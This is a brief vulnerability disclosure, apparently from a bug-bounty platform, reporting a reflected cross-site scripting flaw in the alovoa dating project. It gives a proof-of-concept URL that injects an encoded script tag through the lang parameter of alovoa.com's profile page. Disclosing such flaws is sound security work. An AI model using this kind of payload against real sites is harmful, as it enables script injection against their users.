Cross-site Scripting (XSS) - Reflected in alovoa/alovoaValid
Reported on Jul 19th 2021
🕵️♂️ Proof of Concept
1. Open url
https://alovoa.com/profile?lang=es%22%3E%3Cscript%3Ealert(1)%3C/script%3E and see xss is executed .
My previous xss and this xss has different attacking endpoint and thats why i submitted two report